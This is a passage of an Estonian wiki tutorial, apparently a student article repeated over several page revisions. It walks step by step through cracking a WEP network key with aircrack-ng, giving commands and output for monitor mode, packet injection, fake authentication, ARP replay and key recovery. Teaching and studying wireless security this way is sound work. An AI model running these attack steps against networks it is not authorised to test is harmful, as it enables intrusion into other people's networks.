Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>
'''Märge:''' Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval ''airmon-ng stop athX'' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

'''Pane tähele!''' Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav ''airmon-ng stop ath0'' käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

'''Pane tähele!''' “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

'''Kontrolli:''' Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
 
 
 
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]</ref> 
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:'' 
''-9 - “süstimise” test'' 
''-e teddy – raadiovõrgu nimi'' 
''-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress'' 
''ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

'''Pane tähele!''' Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.
 
 
 
'''Samm 3: Avada airodump-ng pakettide püüdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:'' 
''-c 9 – raadiovõrgu kanal'' 
''--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda'' 
''-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>
 
 
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

''Selgitus:'' 
''-1 – võlts autentimine'' 
''0 – kordusühendus(t)e aeg sekundites'' 
''-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>

Ebaõnnestumise korral on tulemus:
<pre>8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>
 
 
'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode

]</ref> 
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>
 
 
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]</ref> 
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
''-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub'' 
''output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

=Kasutatud kirjandus=
<references />

=Autor=

Kelly Tragel [ISa 21] 
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
</table>

Aircrack

2015-05-25T19:47:13Z

Ktragel: /* Näide WEP võtme lahti murdmise protsessist */

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit.

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 versiooni. </div>

=Üldkirjeldus=

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]</ref>:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.

==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]</ref>: 
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==

'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]</ref> 
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liides:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>
'''Märge:''' Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval ''airmon-ng stop athX'' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

'''Pane tähele!''' Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav ''airmon-ng stop ath0'' käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

'''Pane tähele!''' “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

'''Kontrolli:''' Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
 
 
 
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]</ref> 
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:'' 
''-9 - “süstimise” test'' 
''-e teddy – raadiovõrgu nimi'' 
''-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress'' 
''ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

'''Pane tähele!''' Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.
 
 
 
'''Samm 3: Avada airodump-ng pakettide püüdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:'' 
''-c 9 – raadiovõrgu kanal'' 
''--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda'' 
''-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>
 
 
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

''Selgitus:'' 
''-1 – võlts autentimine'' 
''0 – kordusühendus(t)e aeg sekundites'' 
''-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>

Ebaõnnestumise korral on tulemus:
<pre>8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>
 
 
'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode

]</ref> 
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>
 
 
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]</ref> 
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
''-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub'' 
''output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

=Kasutatud kirjandus=
<references />

=Autor=

Kelly Tragel [ISa 21] 
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
</table>

Aircrack

2015-05-25T19:45:44Z

Ktragel: /* Näide WEP võtme lahti murdmise protsessist */

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit.

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 versiooni. </div>

=Üldkirjeldus=

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]</ref>:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.

==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]</ref>: 
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==

'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]</ref> 
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liides:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>
'''Märge:''' Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval ''airmon-ng stop athX'' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

'''Pane tähele!''' Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav ''airmon-ng stop ath0'' käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

'''Pane tähele!''' “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

'''Kontrolli:''' Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
 
 
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]</ref> 
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:'' 
''-9 - “süstimise” test'' 
''-e teddy – raadiovõrgu nimi'' 
''-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress'' 
''ath0 – raadiovõrgu liides''

Tulemus:
